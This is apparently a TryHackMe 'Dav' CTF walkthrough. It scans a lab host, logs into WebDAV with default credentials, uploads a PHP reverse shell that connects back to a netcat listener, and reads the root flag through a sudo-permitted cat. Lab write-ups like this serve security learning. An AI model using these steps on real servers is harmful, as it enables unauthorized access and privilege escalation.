# CTF TryHackMe - Dav
## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.29.158
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 19:53 CEST
Nmap scan report for 10.10.29.158
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.10 seconds
```

I run another nmap on all ports to be sure to not miss enumeration informations

```bash
nmap -sC -sV -p- -oN nmap_allports.log 10.10.29.158
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 19:53 CEST
Stats: 0:20:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.86% done; ETC: 20:19 (0:04:49 remaining)
Stats: 0:20:24 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.95% done; ETC: 20:19 (0:04:48 remaining)
Stats: 0:22:06 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 84.49% done; ETC: 20:20 (0:04:04 remaining)
Nmap scan report for 10.10.29.158
Host is up (0.056s latency).
Not shown: 65515 closed ports
PORT      STATE    SERVICE       VERSION
80/tcp    open     http          Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
711/tcp   filtered cisco-tdp
3376/tcp  filtered cdbroker
5152/tcp  filtered sde-discovery
5399/tcp  filtered securitychase
6981/tcp  filtered unknown
7543/tcp  filtered atul
11010/tcp filtered unknown
11185/tcp filtered unknown
11917/tcp filtered unknown
16813/tcp filtered unknown
17580/tcp filtered unknown
25155/tcp filtered unknown
35860/tcp filtered unknown
42204/tcp filtered unknown
49693/tcp filtered unknown
50013/tcp filtered unknown
54064/tcp filtered unknown
55345/tcp filtered unknown
62435/tcp filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1814.34 seconds
```


## Gobuster

```bash
gobuster dir -u http://10.10.29.158 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.29.158
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/10/13 20:29:25 Starting gobuster in directory enumeration mode
===============================================================
/webdav               (Status: 401) [Size: 459]
/server-status        (Status: 403) [Size: 300]
                                               
===============================================================
2021/10/13 20:56:07 Finished
===============================================================
```

## Testing default credentials

Test default webdav credentials

```
jigsaw:jigsaw ==> doesn't work
wampp:xampp ==> it works
```

I saw a password file : **password.dav**

```
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
```

This is the HTTP Basic Auth Password (xampp)



## Uploading a reverse shell

Now test to upload file using cadaver


```bash
cadaver http://10.10.29.158/webdav
Authentication required for webdav on server `10.10.29.158':
Username: wampp
Password: 
dav:/webdav/> put /tmp/hello.txt 
Uploading /tmp/hello.txt to `/webdav/hello.txt':
Progress: [=============================>] 100,0% of 6 bytes succeeded.
dav:/webdav/> 
```

It works, lets upload a reverse shell

```bash
dav:/webdav/> put /tmp/php-reverse-shell.php 
Uploading /tmp/php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100,0% of 5493 bytes succeeded
```

Start nc listener

```bash
nc -lvnp 1234
```

Now go to **http://10.10.29.158/webdav/php-reverse-shell.php**

And we got a shell

```bash
nc -lvp 1234 
listening on [any] 1234 ...
10.10.29.158: inverse host lookup failed: Unknown host
connect to [10.9.188.66] from (UNKNOWN) [10.10.29.158] 46844
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:03:58 up  2:15,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```

## PrivEsc

Check sudo permision

```bash
www-data@ubuntu:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
```
Using cat to read **root.txt**

```bash
www-data@ubuntu:/tmp$ sudo cat /root/root.txt
```
